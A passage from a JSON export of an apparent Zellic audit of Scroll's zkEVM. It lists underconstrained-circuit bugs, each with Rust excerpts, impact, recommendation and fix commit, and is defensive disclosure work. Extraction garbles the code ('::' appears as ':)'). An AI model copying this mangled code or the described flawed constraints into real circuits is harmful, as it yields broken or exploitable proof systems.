the fixed part is shown in the witness/tx.rs file\u2019s table_as signments_fixed. Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)Nonce as u64)), /) 2 Value:)known(F:)zero()), Value:)known(F:)from(self.nonce)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)Gas as u64)), /) 4 Value:)known(F:)zero()), Value:)known(F:)from(self.gas)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)GasPrice as u64)), /) 3 Value:)known(F:)zero()), challenges .evm_word() .map(|challenge| rlc:)value(&self.gas_price.to_le_bytes(), challenge)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)CallerAddress as u64)), /) 5 Value:)known(F:)zero()), Value:)known(self.caller_address.to_scalar().unwrap()), [ ], [ ], [ ], [ ], ...)) Scroll The issue here is that the order of the enum TxContextFieldTag matches the layout order in the circuit, except for the case of TxContextFieldTag:)Gas and TxContextFiel dTag:)GasPrice. The usage of the enums as an offset in the circuit can be seen in the circuit logic, as shown below. meta.create_gate(\u201dis_padding_tx\u201d, |meta| { let is_tag_caller_addr = is_caller_addr(meta); let mut cb = BaseConstraintBuilder:)default(); /) the offset between CallerAddress and BlockNumber let offset = usize:)from(BlockNumber) - usize:)from(CallerAddress); /) if tag =) CallerAddress cb.condition(is_tag_caller_addr.expr(), |cb| { cb.require_equal( \u201dis_padding_tx = true if caller_address = 0\u201d, meta.query_advice(is_padding_tx, Rotation(offset as i32)), value_is_zero.expr(Rotation:)cur())(meta), ); }); cb.gate(meta.query_fixed(q_enable, Rotation:)cur())) }); Therefore, for code quality, it is recommended to keep consistency between the actual offsets in the circuit layout and the TxContextFieldTag enum. Swap the order of Gas and GasPrice in the layout or the enum so that it is consistent. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.11 The first row of each Tx in the calldata section is undercon- strained in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The Tx Circuit layout\u2019s latter part deals with the calldata of each transaction. It constrains is_final is boolean if is_final is false \u2013 index' = index + 1 and tx_id' = tx_id \u2013 calldata_gas_cost_acc' = calldata_gas_cost + (value' =) 0 ? 4 : 16) if is_final is true \u2013 tx_id' !) tx_id meta.create_gate(\u201dtx call data bytes\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let is_final_cur = meta.query_advice(is_final, Rotation:)cur()); cb.require_boolean(\u201dis_final is boolean\u201d, is_final_cur.clone()); /) checks for any row, except the final call data byte. cb.condition(not:)expr(is_final_cur.clone()), |cb| { cb.require_equal( \u201dindex:)next =) index:)cur + 1\u201d, meta.query_advice(tx_table.index, Rotation:)next()), meta.query_advice(tx_table.index, Rotation:)cur()) + 1.expr(), ); cb.require_equal( \u201dtx_id:)next =) tx_id:)cur\u201d, tx_id_unchanged.is_equal_expression.clone(), 1.expr(), ); Scroll let value_next_is_zero = value_is_zero.expr(Rotation:)next())(meta); let gas_cost_next = select:)expr(value_next_is_zero, 4.expr(), 16.expr()); /) call data gas cost accumulator check. cb.require_equal( \u201dcalldata_gas_cost_acc:)next =) calldata_gas_cost:)cur + gas_cost_next\u201d, meta.query_advice(calldata_gas_cost_acc, Rotation:)next()), meta.query_advice(calldata_gas_cost_acc, Rotation:)cur()) + gas_cost_next, ); }); /) on the final call data byte, tx_id must change. cb.condition(is_final_cur, |cb| { cb.require_zero( \u201dtx_id changes at is_final =) 1\u201d, tx_id_unchanged.is_equal_expression.clone(), ); }); cb.gate(and:)expr(vec![ meta.query_fixed(q_enable, Rotation:)cur()), meta.query_advice(is_calldata, Rotation:)cur()), not:)expr(tx_id_is_zero.expr(Rotation:)cur())(meta)), ])) }); The issue here is that there is no constraint for the first row of the new transaction. To be exact, there is no constraint that index = 0 and calldata_gas_cost_acc = (value =) 0 ? 4 : 16) for the first row of the transaction. The index and calldata_gas_cost can be maliciously changed for the first row, which may lead to the values in the mentioned columns to be incorrect. We recommend adding the necessary constraints for the first row. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.12 The sv_address is not constrained to be equal throughout a single transaction", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The sv_address is intended to be the column representing the signer\u2019s address. The first constraint on this column is that it is equal to the caller address in the case where the address is nonzero and the transaction type is not L1Msg. Note that this is checked on the offset of CallerAddress. meta.create_gate( \u201dcaller address =) sv_address if it's not zero and tx_type !) L1Msg\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); cb.condition(not:)expr(value_is_zero.expr(Rotation:)cur())(meta)), |cb| { cb.require_equal( \u201dcaller address =) sv_address\u201d, meta.query_advice(tx_table.value, Rotation:)cur()), meta.query_advice(sv_address, Rotation:)cur()), ); }); cb.gate(and:)expr([ meta.query_fixed(q_enable, Rotation:)cur()), meta.query_advice(is_caller_address, Rotation:)cur()), not:)expr(meta.query_advice(is_l1_msg, Rotation:)cur())), ])) }, ); The second constraint on this column is the lookup to the sig circuit. This shows that the sv_address is the recovered address from the ECDSA signature. Note that this is checked on the offset of ChainId. Scroll meta.lookup_any(\u201dSig table lookup\u201d, |meta| { let enabled = and:)expr([ /) use is_l1_msg_col instead of is_l1_msg(meta) because it has lower degree not:)expr(meta.query_advice(is_l1_msg_col, Rotation:)cur())), /) lookup to sig table on the ChainID row because we have an indicator of degree 1 /) for ChainID and ChainID is not far from (msg_hash_rlc, sig_v, /) ...))) meta.query_advice(is_chain_id, Rotation:)cur()), ]); let msg_hash_rlc = meta.query_advice(tx_table.value, Rotation(6)); let chain_id = meta.query_advice(tx_table.value, Rotation:)cur()); let sig_v = meta.query_advice(tx_table.value, Rotation(1)); let sig_r = meta.query_advice(tx_table.value, Rotation(2)); let sig_s = meta.query_advice(tx_table.value, Rotation(3)); let sv_address = meta.query_advice(sv_address, Rotation:)cur()); let v = is_eip155(meta) * (sig_v.expr() - 2.expr() * chain_id - 35.expr()) + is_pre_eip155(meta) * (sig_v.expr() - 27.expr()); let input_exprs = vec![ 1.expr(), /) q_enable = true msg_hash_rlc, /) msg_hash_rlc v, sig_r, sig_s, /) sig_v /) sig_r /) sig_s sv_address, 1.expr(), /) is_valid ]; /) LookupTable:)table_exprs is not used here since `is_valid` not used by evm circuit. let table_exprs = vec![ meta.query_fixed(sig_table.q_enable, Rotation:)cur()), /) msg_hash_rlc not needed to be looked up for tx circuit? meta.query_advice(sig_table.msg_hash_rlc, Rotation:)cur()), meta.query_advice(sig_table.sig_v, Rotation:)cur()), meta.query_advice(sig_table.sig_r_rlc, Rotation:)cur()), Scroll meta.query_advice(sig_table.sig_s_rlc, Rotation:)cur()), meta.query_advice(sig_table.recovered_addr, Rotation:)cur()), meta.query_advice(sig_table.is_valid, Rotation:)cur()), ]; input_exprs .into_iter() .zip(table_exprs.into_iter()) .map(|(input, table)| (input * enabled.expr(), table)) .collect() }); The offset of the sv_address that is checked in the two constraints are different, and there are no constraints to enforce that these two sv_address values are equal. In other words, there are no constraints to check that the sv_address value is equal throughout the rows that represent the same transaction. An attacker may use different addresses for the caller address and the ECDSA sig- nature\u2019s recovered address. Depending on the exact logic of the other circuits, this could lead to arbitrary contract calls without proper ECDSA signatures. We recommend adding the check that sv_address is equal throughout the rows of the same transaction. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2565e254. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.13 Block number constraints are incorrect in PI circuit", + "labels": [ + "Zellic" + ], + "body": "Target: PI Circuit, pi_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: High : High The block table is composed of a fixed column tag and advice columns index and value. ///)) Table with Block header fields #)derive(Clone, Debug)] pub struct BlockTable { ///)) Tag pub tag: Column, ///)) Index pub index: Column, ///)) Value pub value: Column, } Here, the index column is the block number corresponding to the row. The assign- ments for this table are shown in witness/block.rs. [ vec![ [ ], [ u64)), ], [ Value:)known(F:)from(BlockContextFieldTag:)Coinbase as u64)), Value:)known(current_block_number), Value:)known(self.coinbase.to_scalar().unwrap()), Value:)known(F:)from(BlockContextFieldTag:)Timestamp as Value:)known(current_block_number), Value:)known(self.timestamp.to_scalar().unwrap()), Value:)known(F:)from(BlockContextFieldTag:)Number as u64)), Scroll Value:)known(current_block_number), Value:)known(current_block_number), Value:)known(F:)from(BlockContextFieldTag:)Difficulty as ], [ u64)), Value:)known(current_block_number), randomness.map(|rand| rlc:)value(&self.difficulty.to_le_bytes(), rand)), ], [ ], [ Value:)known(F:)from(BlockContextFieldTag:)GasLimit as u64)), Value:)known(current_block_number), Value:)known(F:)from(self.gas_limit)), Value:)known(F:)from(BlockContextFieldTag:)BaseFee as u64)), Value:)known(current_block_number), randomness .map(|randomness| rlc:)value(&self.base_fee.to_le_bytes(), randomness)), ], [ ], [ ], [ u64)), ], ], Value:)known(F:)from(BlockContextFieldTag:)ChainId as u64)), Value:)known(current_block_number), Value:)known(F:)from(self.chain_id)), Value:)known(F:)from(BlockContextFieldTag:)NumTxs as u64)), Value:)known(current_block_number), Value:)known(F:)from(num_txs as u64)), Value:)known(F:)from(BlockContextFieldTag:)CumNumTxs as Value:)known(current_block_number), Value:)known(F:)from(cum_num_txs as u64)), self.block_hash_assignments(randomness), Scroll ] To constrain the block number, two checks are needed. The index values for these rows are equal. The index value is equal to the value column\u2019s value in the BlockContextFieldT ag:)Number row. However, this is incorrectly done. for (row, tag) in block_ctx .table_assignments(num_txs, cum_num_txs, challenges) .into_iter() .zip(tag.iter()) { region.assign_fixed( |) format!(\u201dblock table row {offset}\u201d), self.block_table.tag, offset, |) row[0], )?; /) index_cells of same block are equal to block_number. let mut index_cells = vec![]; let mut block_number_cell = None; for (column, value) in block_table_columns.iter().zip_eq(&row[1.)]) { let cell = region.assign_advice( |) format!(\u201dblock table row {offset}\u201d), *column, offset, |) *value, )?; if *tag =) Number &) *column =) self.block_table.value { block_number_cell = Some(cell.clone()); } if *column =) self.block_table.index { index_cells.push(cell.clone()); } if *column =) self.block_table.value { block_value_cells.push(cell); } } for i in 0.)(index_cells.len() - 1) { Scroll region.constrain_equal(index_cells[i].cell(), index_cells[i + 1].cell())?; } if *tag =) Number { region.constrain_equal( block_number_cell.unwrap().cell(), index_cells[0].cell(), )?; } ...)) } Here, the index_cells array and block_number_cell is taken for every single row, and the equality constraints between the cells are added. This means that the equality constraints between the index_cells are not actually properly being done, as this ar- ray is created for every row, not for every block. The block table\u2019s index column may not be equal to the block number. We recommend taking the declaration of the index_cells array and the block_numbe r_cell as well as the equality constraints outside the for loop of the table assignments. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.14 Missing constraint for the first tx_id in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: High : High For the tx_id column, the constraints are that if tag' = Nonce, then tx_id' = tx_id + 1, and if tag' !) Nonce, then tx_id' = tx_id. While the transitions of the tx_id column are correct, there is no check that the first tx_id is equal to 1 in the Tx Circuit. meta.create_gate(\u201dtx_id transition\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); /) if tag_next =) Nonce, then tx_id' = tx_id + 1 cb.condition(tag_bits.value_equals(Nonce, Rotation:)next())(meta), |cb| { cb.require_equal( \u201dtx_id increments\u201d, meta.query_advice(tx_table.tx_id, Rotation:)next()), meta.query_advice(tx_table.tx_id, Rotation:)cur()) + 1.expr(), ); }); /) if tag_next !) Nonce, then tx_id' = tx_id, tx_type' = tx_type cb.condition( not:)expr(tag_bits.value_equals(Nonce, Rotation:)next())(meta)), |cb| { cb.require_equal( \u201dtx_id does not change\u201d, meta.query_advice(tx_table.tx_id, Rotation:)next()), meta.query_advice(tx_table.tx_id, Rotation:)cur()), ); cb.require_equal( \u201dtx_type does not change\u201d, meta.query_advice(tx_type, Rotation:)next()), Scroll meta.query_advice(tx_type, Rotation:)cur()), ); }, ); cb.gate(and:)expr([ meta.query_fixed(q_enable, Rotation:)cur()), not:)expr(meta.query_advice(is_calldata, Rotation:)next())), ])) }); The first tx_id value is not guaranteed to be 1, so tx_id can start with an arbitrary value. We recommend adding the check for the first tx_id. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.15 The CallDataRLC value in the fixed assignments is not vali- dated against the actual calldata in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The fixed part of the Tx Circuit layout includes the row representing the CallDataRL C, which is the random linear combination of the calldata bytes. This value is also checked from the RLP circuit as well. The dynamic part of the Tx Circuit layout includes the raw calldata bytes for each transaction. The issue is that while there are checks for the CallDataGasCost and CallDataLength via lookups, there is no check the CallDataRLC value is actually equal to the RLC of the bytes in the calldata section. The actual calldata used can be different from the one in the RLP circuit or the fixed part of the Tx Circuit. We recommend adding the check of the consistency between the CallDataRLC and the calldata part of the Tx Circuit layout via a lookup argument. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.16 The OneHot encoding gadget has incorrect constraints", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/one_hot.rs Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The OneHot gadget has a previous helper function that returns the enum type repre- sented by the one-hot encoding at the previous row. impl OneHot { /) ...)) pub fn previous(&self) -> Query { T:)iter().enumerate().fold(Query:)zero(), |acc, (i, t)| { acc.clone() + Query:)from(u64:)try_from(i).unwrap()) * self .columns .get(&t) BinaryColumn:)current) .map_or_else(BinaryQuery:)zero, }) } /) ...)) } However, this implementation is incorrect as it queries the value of the binary columns representing the one-hot encoding at the current row. The OneHot gadget is used to maintain the validity of the transitions between various proof types in the MPT Circuit. For example, cb.condition(!is_start, |cb| { cb.assert_equal( \u201dproof type does not change\u201d, proof_type.current(), Scroll proof_type.previous(), ); this incorrect constraint can be used to generate invalid proofs in the MPT Circuit. We recommend fixing the incorrect constraint by using BinaryColumn:)previous to query the previous row. This issue has been acknowledged by Scroll, and a fix was implemented in commit 9bd18782. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.17 The BinaryColumn gadget is missing boolean constraint check", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, constraint_builder/binary_column.rs Severity: High Category: Underconstrained Cir- : High cuits Likelihood: High The BinaryColumn gadget is used by the OneHot encoding gadget to store information about the ProofType and SegmentType of each row. This gadget also assumes that the binary column exposed by the gadget only contains boolean (0/1) values. However, no such constraint exists in the BinaryColumn gadget to check this assump- tion: impl BinaryColumn { /) ...)) pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); /) TODO: constrain to be binary here...)) /) cb.add_constraint() Self(advice_column) } } By assigning nonboolean values to the binary columns, one can generate inconsistent results returned by the queries to the OneHot gadget. This can lead to incorrect proof generation in the MPT Circuit, which makes use of these gadgets. We recommend adding a boolean constraint on the advice column in the BinaryColu mn gadget. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 34af759e. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.18 Missing range check for address values in MPT Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: Critical : Critical cuits Likelihood: High Descripton In the MPT Circuit, the account address is used to calculate the MPT key where account data is stored in the state trie: impl MptUpdateConfig { pub fn configure(/)...))*)) { /) ...)) cb.condition(is_start.clone().and(cb.every_row_selector()), |cb| { let [address, address_high, .)] = intermediate_values; let [old_hash_rlc, new_hash_rlc, .)] = second_phase_intermediate_values; let address_low: Query = (address.current() - address_high.current() * (1 <) 32)) * (1 <) 32) * (1 <) 32) * (1 <) 32); cb.poseidon_lookup( \u201daccount mpt key = h(address_high, address_low)\u201d, [address_high.current(), address_low, key.current()], poseidon, ); /)...)) }) } } There need to be range checks on the various values of address: The address needs to be range checked to be within 20 bytes or 160 bits The address_high must be range checked to be within 16 bytes or 128 bits. The calculated value of address_low (before the multiplication by 2^96) must be range checked to be within 4 bytes or 32 bits. Scroll Without the necessary range checks, one can calculate multiple combinations of add ress_low and address_high for the same value of address. This results in multiple MPT keys for a single address, which leads to a invalid state trie. We recommend adding the appropriate range checks to the intermediate columns as mentioned above. This issue has been acknowledged by Scroll, and a fix was implemented in commit e4f5df31. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.19 Incorrect assertion for account hash traces in Proof:)check", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, types.rs Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The Proof:)check function ensures that the account hash traces that are used as inter- mediate witnesses for the MPT circuit are generated correctly. One of the assertions in this function contains a typo: impl Proof { fn check(&self) { /) ...)) assert_eq!( hash( hash(Fr:)one(), self.leafs[0].unwrap().key), self.leafs[0].unwrap().value_hash ), self.old_account_hash_traces[5][2], ); assert_eq!( hash( hash(Fr:)one(), self.leafs[1].unwrap().key), self.leafs[1].unwrap().value_hash ), self.new_account_hash_traces[5][2], ); /) ...)) } } If we looked at account_hash_traces where these traces are generated, we see that the left-hand side of the assertion is actually equal to the entry account_hash_traces[ 6][2]: fn account_hash_traces(address: Address, account: AccountData, storage_root: Fr) -> [[Fr; 3]; 7] { let account_key = account_key(address); let h5 = hash(Fr:)one(), account_key); Scroll let poseidon_codehash = big_uint_to_fr(&account.poseidon_code_hash); let account_hash = hash(h4, poseidon_codehash); /) ...)) account_hash_traces[5] = [Fr:)one(), account_key, h5]; account_hash_traces[6] = [h5, account_hash, hash(h5, account_hash)]; } As this function is not used anywhere, there is no security impact. However, we rec- ommend fixing this for code maturity as it may be used in tests in the future. Change the right-hand side of the assertion to the correct index. This issue has been acknowledged by Scroll, and a fix was implemented in commit 753d2f91. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.20 Implementations of RlcLookup trait are not consistent", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit Category: Code Maturity Likelihood: Low Severity: Informational : Informational The MPT Circuit uses the RlcLookup trait to perform lookups about the RLC values of various witnesses. This trait is defined in byte_representation.rs: pub trait RlcLookup { fn lookup(&self) -> [Query; 3]; } This lookup trait is implemented by two gadgets: ByteRepresentation and CanonicalR epresentation: impl RlcLookup for ByteRepresentationConfig { fn lookup(&self) -> [Query; 3] { self.value.current(), self.index.current(), self.rlc.current(), [ ] } } impl RlcLookup for CanonicalRepresentationConfig { fn lookup(&self) -> [Query; 3] { self.value.current(), self.rlc.current(), self.index.current(), [ ] } } While both of these gadgets implement the same lookup trait, they have a different order of columns. Not only that, but the definition of value is different \u2014 while value in Scroll the ByteRepresentationConfig is the value of the accumulated bytes so far, the value in the CanonicalRepresentationConfig is the value of the entire field element. This lookup trait is used in word_rlc.rs with a implicit assumption that the RlcLookup is implemented by the ByteRepresentationConfig. While there are no wrong lookups performed currently, there is a chance that future changes to the code may introduce security issues due to incorrect assumptions on the structure of the RlcLookup. We recommend introducing distinct traits for these two different lookups to remove the ambiguity and improve code maturity. This issue has been acknowledged by Scroll, and a fix was implemented in commit b5ea508b. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.21 Missing constraints for new account in configure_balance", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: High : High cuits Likelihood: Medium Descripton Within configure_balance in the MPT circuit, with segment type AccountLeaf3 and path type ExtensionNew, there should be a constraint that ensures that the sibling is equal to 0. This corresponds to the case when we are creating a new entry in the accounts trie and we are assigning the balance of the account as the first entry. Without this constraint, there may be soundness issues when updating the balance of a new address. We recommend adding a check to constraint the sibling (i.e., nonce/codesize) to be equal to 0. This issue has been acknowledged by Scroll, and a fix was implemented in commit ef64eb52. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.22 Missing constraints in configure_empty_storage", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: Critical : Critical cuits Likelihood: Medium Descripton There should be a check to ensure that the old_hash and new_hash are the same for an empty storage entry. This is similar to the case in configure_empty_account where the same thing is in fact constrained: fn configure_empty_account(/) ...)) *)) { /) ...)) cb.assert_equal( \u201dhash doesn't change for empty account\u201d, config.old_hash.current(), config.new_hash.current(), ); /) ...)) } This may lead to soundness issues when proving that storage does not exist. We recommend adding a check to constrain the equality of the old and the new hash. This issue has been acknowledged by Scroll, and a fix was implemented in commit 3ab166a4. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.23 Enforcing padding rows in MPT circuit", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: Medium : Medium cuits Likelihood: Low Descripton The configure_empty_storage and configure_empty_account use the following check to determine if the current row is the final segment. let is_final_segment = config.segment_type.next_matches(&[SegmentType:)Start]); In the case that the current proof is the last proof in the MPT table, this assumes that the rows after the last proof are populated with the appropriate padding rows. However, there are no constraints to ensure that these padding rows have been as- signed properly at the end of the MPT circuit. Without this constraint, there may be soundness issues for MPTProofType:)StorageDo esNotExist and MPTProofType:)AccountDoesNotExist. We recommend adding checks in the circuit to ensure that the padding rows have been assigned following the algorithm in assign_padding_row. This issue has been acknowledged by Scroll, and a fix was implemented in commit ac3f8d89. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.24 Incorrect constraints in configure_nonce", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: High : High cuits Likelihood: Medium Descripton In configure_nonce, when the segment type is AccountLeaf3 and the path type is Comm on, there is a missed check on the size of the new nonce. This is because the old value of the nonce is mistakenly checked (see [1]). Additionally, there is another incorrect check when the path type is ExtensionNew where the old nonce is range checked instead of the new nonce (see [2]). fn configure_nonce(/) ...)) *)) { /) ...)) SegmentType:)AccountLeaf3 => { /) ...)) cb.condition( config.path_type.current_matches(&[PathType:)Common]), |cb| { cb.add_lookup( \u201dnew nonce is 8 bytes\u201d, [config.old_value.current(), Query:)from(7)], /) [1] Typo. bytes.lookup(), ); /) ...)) } ); cb.condition( config.path_type.current_matches(&[PathType:)ExtensionNew]), |cb| { cb.add_lookup( \u201dnew nonce is 8 bytes\u201d, [config.old_value.current(), Query:)from(7)], /) [2] Typo bytes.lookup(), ); Scroll /) ...)) }, ); } /) ...)) } As the nonce values are not range checked properly, proofs about accounts with in- valid nonces can be generated. This could potentially lead to denial-of-service attacks on addresses. Fix the typos to range check the correct nonce values. This issue has been acknowledged by Scroll, and a fix was implemented in commit 9aeff02e. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.25 Conflicting constraints in configure_code_size", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Coding Mistakes Likelihood: Low Severity: Low : Low Descripton In configure_code_size, the first line ensures that the only possible path types that can be proved are PathType:)Start and PathType:)Common. fn configure_code_size( cb: &mut ConstraintBuilder, config: &MptUpdateConfig, bytes: &impl BytesLookup, ) { cb.assert( \u201dnew accounts have balance or nonce set first\u201d, config .path_type .current_matches(&[PathType:)Start, PathType:)Common]), ); /) ...)) } However, later on in the function, there are constraints that are conditioned on the current path type being either PathType:)ExtensionOld or PathType:)ExtensionNew. These two above-mentioned constraints are contradictory, and the code later on will never be executed as these conditions cannot be true. A similar issue also exists in configure_poseidon_code_hash. If this is intended behavior, then the above-mentioned constraints are dead code and add to unnecessary code complexity. We recommend removing those constraints if they are not necessary. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 004fcddb. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.26 ByteRepresentation:)index is not properly constrained", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/byte_representation.rs Category: Underconstrained Cir- Severity: Medium : Medium cuits Likelihood: Low Descripton In the ByteRepresentation gadget, there is a constraint which ensures that the index always increases by 1 or is 0. The expected behavior is that it constrains the value of index to be 0 at the first row. impl ByteRepresentationConfig { pub fn configure(/) ...)) *)) -> Self { let [value, index, byte] = cb.advice_columns(cs); let [rlc] = cb.second_phase_advice_columns(cs); let index_is_zero = IsZeroGadget:)configure(cs, cb, index); cb.assert_zero( \u201dindex increases by 1 or resets to 0\u201d, index.current() * (index.current() - index.previous() - 1), ); At the first row, a rotation to the previous row will wrap around to the last row of the table, which includes the blinding factors in Halo2. This lets the value of the index be controlled by values in the last row of the table. Instead of the index being set to 0 in the first row, a prover can arbitrary non-zero value depending on the contents of the last row of the table. We recommend adding a selector which enables a constraint to constrain that index = 0 at the first row. This issue has been acknowledged by Scroll, and a fix was implemented in commit c8f9c7f3. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.27 Miscellaneous typos in comments and constraint descrip- tions", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit Category: Code Maturity Likelihood: N/A Descripton Severity: Informational : Informational In byte_representation.rs, the following constraints have incorrect comments. They should have (index !) 0). cb.assert_equal( \u201dcurrent value = previous value * 256 * (index =) 0) + byte\u201d, value.current(), value.previous() * 256 * !index_is_zero.current() + byte.current(), ); cb.assert_equal( \u201dcurrent rlc = previous rlc * randomness * (index =) 0) + byte\u201d, rlc.current(), rlc.previous() * randomness.query() * !index_is_zero.current() + byte.current(), ); In mpt_update.rs, the function configure_code_size has the following constraint. The description is incorrect, as it actually checks that the balance is 0. cb.assert_zero( \u201dnonce and code size are 0 for ExtensionNew balance update\u201d, config.sibling.current(), ); In mpt_update.rs, the following constraint has an incorrect description. The constraint checks new_value, but the comment mentions old_value. cb.condition(!is_start, |cb| { /) ...)) cb.assert_equal( /) typo \u201dold_value does not change\u201d, Scroll new_value.current(), new_value.previous(), ); }); In account.rs, the computation of old_root and new_root are incorrect. impl AccountProof { pub fn old_root(&self) -> Fr { self.trie_rows .old_root(|) self.old_leaf.hash(self.storage.new_root())) /) old_root, but uses new_root to hash } pub fn new_root(&self) -> Fr { self.trie_rows .new_root(|) self.new_leaf.hash(self.storage.old_root())) /) new_root, but uses old_root to hash } } There is also a typo in implementing From<&SMTTrace> for AccountProof. impl From<&SMTTrace> for AccountProof { fn from(trace: &SMTTrace) -> Self { let address = Address:)from(trace.address.0); let [old_path, new_path] = &trace.account_path; let old_leaf = old_path.leaf; let new_leaf = new_path.leaf; let trie_rows = TrieRows:)new( account_key(address), &new_path.path, /) here - might be old_path.path &new_path.path, old_path.leaf, new_path.leaf, ); /) ...)) } } Scroll We recommend fixing these mistakes for better code maturity. This issue has been acknowledged by Scroll, and fixes were implemented in the fol- lowing commits: f89e2d58 f9ff6bb5 Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.28 ChainId is not mapped to it\u2019s corresponding RLP Tag in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: Medium Severity: High : High Descripton In the Tx Circuit, the TxFieldTag values in the tag_bits column are mapped to their respective RLP Tag values using the following map: let rlp_tag_map: Vec<(Expression, RlpTag)> = vec![ (is_nonce(meta), Tag:)Nonce.into()), (is_gas_price(meta), Tag:)GasPrice.into()), /) ...)) (is_caller_addr(meta), Tag:)Sender.into()), (is_tx_gas_cost(meta), GasCost), /) tx tags which correspond to Null (is_null(meta), Null), (is_create(meta), Null), /) ...)) (is_block_num(meta), Null), (is_chain_id_expr(meta), Null), ]; In this map, the values which do not have a corresponding RLP Tag are set to Null. Here, chain_id is incorrectly set to Null even though it is part of the RLP encoded transaction (Tag:)ChainId). The rlp_tag values are used to lookup into the RLP table to ensure that the appropriate values are being hashed for verifying the transaction signature. meta.create_gate(\u201dsign tag lookup into RLP table condition\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let is_tag_in_tx_sign = sum:)expr([ is_nonce(meta), Scroll is_gas_price(meta), is_gas(meta), is_to(meta), is_value(meta), is_data_rlc(meta), is_sign_length(meta), is_sign_rlc(meta), ]); cb.require_equal( 